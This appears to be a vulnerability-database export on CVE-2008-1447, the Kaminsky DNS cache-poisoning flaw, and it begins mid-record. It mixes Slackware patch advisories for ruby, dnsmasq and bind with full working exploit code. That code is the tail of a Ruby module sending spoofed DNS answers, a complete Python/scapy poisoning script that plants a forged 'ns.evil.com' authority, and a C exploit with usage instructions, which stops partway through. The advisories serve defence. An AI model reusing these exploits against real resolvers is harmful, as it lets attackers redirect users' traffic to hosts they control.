spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "slackware": [{"lastseen": "2020-10-25T16:35:52", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New ruby packages are available for Slackware 11.0, 12.0, and 12.1 to\nfix bugs and a security issue.\n\nMore details about the issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz:\n Upgraded to ruby-1.8.6-p287.\n This fixes several bugs in the previous Ruby update, including a security\n issue where the DNS resolver did not randomize the source port and\n transaction id sufficiently.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n68f319999719565f3f05acf61e791f92 ruby-1.8.6_p287-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n967059ae6d9a3a3ea609472e4f3c3903 ruby-1.8.6_p287-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbc821c4e4eee3608e1c5e2e30238b450 ruby-1.8.6_p287-i486-1_slack12.1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ruby-1.8.6_p287-i486-1_slack12.1.tgz", "modified": "2008-11-29T21:37:03", "published": "2008-11-29T21:37:03", "id": "SSA-2008-334-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.371754", "type": "slackware", "title": "[slackware-security] ruby", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New dnsmasq packages are available for Slackware 10.0, 10.1, 10.2, 11.0,\n12.0, 12.1, and -current to address possible DNS cache poisoning issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz:\n Upgraded to dnsmasq-2.45.\n It was discovered that earlier versions of dnsmasq have DNS cache\n weaknesses that are similar to the ones recently discovered in BIND.\n This new release minimizes the risk of cache poisoning.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/dnsmasq-2.45-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/dnsmasq-2.45-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/dnsmasq-2.45-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/dnsmasq-2.45-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/dnsmasq-2.45-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.45-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.0 package:\ne1f567c3679e23ab3f80a86cec1343c4 dnsmasq-2.45-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\naabb7b9b872654b9b663014d49ba37c1 dnsmasq-2.45-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n41c8042baabfdbdeb7b59f2fd48cbc08 dnsmasq-2.45-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nfab50ae940bde92eabba0c062908ef42 dnsmasq-2.45-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb8e850a726270c0d7e305a7c6523ede4 dnsmasq-2.45-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n1c61011340f57e4179c788f3f0127dc0 dnsmasq-2.45-i486-1_slack12.1.tgz\n\nSlackware -current package:\n11fe1505a7177ec1a1c84a1b259b9c03 dnsmasq-2.45-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg dnsmasq-2.45-i486-1_slack12.1.tgz\n\nRestart dnsmasq:\n > sh /etc/rc.d/rc.dnsmasq restart", "modified": "2008-07-24T00:02:47", "published": "2008-07-24T00:02:47", "id": "SSA-2008-205-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.452680", "type": "slackware", "title": "[slackware-security] dnsmasq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recurive resolvers with spoofed data. DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc693e1ae4997c7cc23c0051ec1c90796 bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n24326f563c6588a0541f3409bc7298cd bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n67178dd97006cf4cf3543704c82741b8 bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\na12c9e8304c5a7e285fa4df7d4b9756b bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n6209e4a5f9693451279b0d02795b9bd8 bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne1c6d74c787fa3b7f3a5905fef206206 bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nd354a0118388bb0f3fd32fa79166746a bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n5b1087e6a0dc79ebf06144f44d5bb52f bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nda76550505d62f0d902b710a078d1020 bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nSlackware -current package:\nc255530e46f4cff8080a20b6c8d12443 bind-9.4.2_P1-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nThen, restart the nameserver:\n > /etc/rc.d/rc.bind restart", "modified": "2008-07-10T04:29:01", "published": "2008-07-10T04:29:01", "id": "SSA-2008-191-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239", "type": "slackware", "title": "[slackware-security] bind", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning (Python)", "edition": 1, "published": "2008-07-24T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning (Python)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF", "href": "", "sourceData": "from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = \"X.X.X.X\"\n# Vulnerable recursive DNS server\ntargetdns = \"X.X.X.X\"\n# Authoritative NS for the target domain\nsrcdns = [\"X.X.X.X\"]\n\n# Domain to play with\ndummydomain = \"\"\nbasedomain = \".example.com.\"\n# sub-domain to claim authority on\ndomain = \"sub.example.com.\"\n# Spoofed authoritative DNS for the sub-domain\nspoof=\"ns.evil.com.\"\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = \"a\" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint \"Sending our reply from %s with TXID = %s for %s\" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint \"Successfully poisonned our target with a dummy record !!\"\n\t\t\tbreak\n\texcept:\n\t\tprint \"Poisonning failed\"\n\n# milw0rm.com [2008-07-24]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define _BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, &len2, data);\n *len += len2;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: 